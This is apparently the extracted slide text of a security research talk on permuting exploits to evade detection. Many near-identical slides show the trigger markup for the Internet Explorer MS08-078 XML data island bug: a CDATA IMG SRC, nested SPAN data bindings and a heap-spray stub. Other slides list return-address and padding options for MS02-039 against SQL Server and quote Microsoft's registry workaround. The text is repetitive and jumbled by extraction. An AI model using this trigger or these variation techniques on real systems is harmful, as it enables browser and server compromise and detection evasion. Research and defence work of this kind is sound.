  • 96. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 97. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 98. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 99. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 100. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 101. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 102. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 103. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 104. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 105. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t 0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 106. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t DATAFLD 0a0a0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 107. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATAFLD 0x0a0a0a0a Exploitation shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 108.
  • 109. Approach Unconditional Vulnerability Complete (YES) Incomplete (NO) Vulnerable Documentation? Document Alternatives? Ecosystem Reverse Reversing? Alternatives? Alternatives Engineer Obfuscation Exploitation Arbitrary code Alternatives Detection Attack detection Permutation
  • 110. POPed MS02-039 • SQL Request: • JUMP: – CLNT_UCAST_INST (0x04). – Unconditional JUMP short, relative, and forward to REL8. • SQL INSTANCENAME: – There are 115 possible values to REL8. – ASCII hexa values from 0x01 to 0xff, except: – 115 permutations. 0x0a, 0x0d, , 0x2f, 0x3a and 0x5c. – 24,000 permutations. • Writable address and memory alignment: – There are 26,758 new writable addresses within • Return address: SQLSORT.DLL (Microsoft SQL Server 2000 – Uses the “jump to register” technique, in this SP0/SP1/SP2). There are much more writable case the ESP register. addresses if do not mind making it hardcoded. – There are four (4) new possible return addresses – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and within SQLSORT.DLL (Microsoft SQL Server “OlyDBG 2.01 alpha 2” by Oleh Yuschuk. 2000 SP0/SP1/SP2). There are much more return – 26,758 permutations. addresses if do not mind making it hardcoded. – Tools: “Findjmp.c” by Ryan Permeh, (“Hacking • Padding and memory alignment: Proof your Network – Second Edition”, 2002), – ASCII hexa values from 0x01 to 0xff. and “DumpOp.c” by Koskya Kortchinsky (“Macro – The length may vary, depending on JUMP, from reliability in Win32 Exploits” – Black Hat Europe, 3,048 to 29,210 possibilities. 2007). – 29,210 permutations. – 4 permutations.
  • 113. POPed MS08-078 CVE-2008-4844 “…crafted XML document containing nested <SPAN> elements…”
  • 114. POPed MS08-078 CVE-2008-4844 “…crafted XML document containing nested <SPAN> elements…”
  • 115. POPed MS08-078 • XML Data Island: • Data Consumer (HTML elements): – There are two (2) options: using the Dynamic – According to MSDN (“Binding HTML Elements HTML (DHTML) <XML> element within the to Data”) there are, at least, fifteen (15) bindable HTML document or overloading the HTML HTML elements available, but only five (5) <SCRIPT> element. Unfortunately, the HTML elements are useful. <SCRIPT> element is useless. – The HTML element is a key trigger, because it points to a dereferenced XML DSO, but it does • Data Source Object (DSO): not have to be the same HTML element to do so – The HTML <XML> element holds a reference – it can be any mixed HTML element. to a XML DSO, but a XML DSO can also be a – 25 permutations. reference used by another HTML element: • <OBJECT>. • Return address: – The HTML <OBJECT> element uses Class ID – Uses “Heap Spray” technique, in this case the to reference: XML DSO or Tabular Data XML DSO handles the return address, and can Control (TDC). use “.NET DLL” technique by Mark Dowd and – 4 permutations. Alexander Sotirov (“How to Impress Girls with Browser Memory Protection Bypasses” – Black Hat USA, 2008). • Reference: – There are, at least, four (4) new possible return – Characters like “<” and “&” are illegal in <XML> addresses. element. To avoid errors <XML> element can be defined as CDATA (Unparsed Character Data). – 4 permutations. But the <XML> element can be also defined as “&lt;” instead of “<”. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations.
  • 116. POPed MS08-078 • XML Data Island: • Data Consumer (HTML elements): – There are two (2) options: using the Dynamic – According to MSDN (“Binding HTML Elements HTML (DHTML) <XML> element within the to Data”) there are, at least, fifteen (15) bindable HTML document or overloading the HTML HTML elements available, but only five (5) <SCRIPT> element. Unfortunately, the HTML elements are useful. <SCRIPT> element is useless. – The HTML element is a key trigger, because it points to a dereferenced XML DSO, but it does • Data Source Object (DSO): not have to be the same HTML element to do so – The HTML <XML> element holds a reference – it can be any mixed HTML element. to a XML DSO, but a XML DSO can also be a – 25 permutations. reference used by another HTML element: • <OBJECT>. • Return address: – The HTML <OBJECT> element uses Class ID – Uses “Heap Spray” technique, in this case the to reference: XML DSO or Tabular Data XML DSO handles the return address, and can Control (TDC). use “.NET DLL” technique by Mark Dowd and – 4 permutations. Alexander Sotirov (“How to Impress Girls with Browser Memory Protection Bypasses” – Black Hat USA, 2008). • Reference: – There are, at least, four (4) new possible return – Characters like “<” and “&” are illegal in <XML> addresses. element. To avoid errors <XML> element can be defined as CDATA (Unparsed Character Data). – 4 permutations. But the <XML> element can be also defined as “&lt;” instead of “<”. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations.
  • 117. POPed MS08-078 • Workarounds for Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844 … – Disable XML Island functionality • Create a backup copy of the registry keys by using the following command from an elevated command prompt: … • Next, save the following to a file with a .REG extension, such as Disable_XML_Island.reg: Windows Registry Editor Version 5.00 [-HKEY_CLASSES_ROOTCLSID{379E501F-B231-11D1-ADC1-00805FC752D8}] • Run Disable_XML_Island.reg with the following command from an elevated command prompt: Regedit.exe /s Disable_XML_Island.reg 550DDA30-0541-11D2-9CA9-0060B0EC3D39 (XML Data Source Object 1.0) F5078F1F-C551-11D3-89B9-0000F81FE221 (XML Data Source Object 2.6) F5078F39-C551-11D3-89B9-0000F81FE221 (XML Data Source Object 3.0) F6D90F14-9C73-11D3-B32E-00C04F990BB4 (XML Data Source Object 3.0) 333C7BC4-460F-11D0-BC04-0080C7055A83 (Tabular Data Control)
  • 118.
  • 119. Demonstration DEMONSTRATION [Play Video]